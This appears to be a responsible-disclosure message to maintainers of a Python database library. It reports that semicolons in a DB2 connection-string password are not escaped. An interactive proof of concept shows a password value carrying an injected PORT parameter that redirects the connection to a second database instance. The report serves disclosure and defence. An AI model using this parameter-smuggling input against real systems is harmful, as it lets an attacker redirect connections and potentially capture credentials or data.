Hi,

I discovered an issue in the db engine creation code.
When the code prepares the db connection string, it fails to escape the 
semicolon char. This makes it possible to inject arbitrary parameters into 
the connection string.
Under some circumstances this can be a security issue.

PoC:
I created two db2 instances in docker: one is listening on tcp/50000 
(default) and the other on tcp/50001.

ActivePython 2.7.8.10 (ActiveState Software Inc.) based on
Python 2.7.8 (default, Jul  2 2014, 19:48:49) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sqlalchemy
>>> from sqlalchemy import *
>>> import ibm_db_sa
>>> from urllib import quote
>>> import sys
>>>
>>> pw="aaa"
>>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall()
[(u'b5b9411e889e',)]
>>> conn.close()
>>>
>>> pw="aaa;PORT=50001"
>>> db2 = sqlalchemy.create_engine('ibm_db_sa://db2inst1:%s@192.168.99.100/test' % quote(pw))
>>> conn = db2.connect()
>>> conn.execute("select host_name from TABLE(SYSPROC.ENV_GET_SYS_INFO()) AS SYSTEMINFO").fetchall()
[(u'e6aa666c18bf',)]
>>> conn.close()
>>> sqlalchemy.__version__
'0.9.8'

As you can see, I was able to trick the program into connecting to an alternative 
database via the password. (Which is a realistic vector, I think.)

My sqlalchemy version is not the latest because I installed it from the 
ActiveState repo. If you've already fixed this then ignore my message. 
Unfortunately I don't have time to further test this with other versions or 
DB drivers.

Regards

Miklós
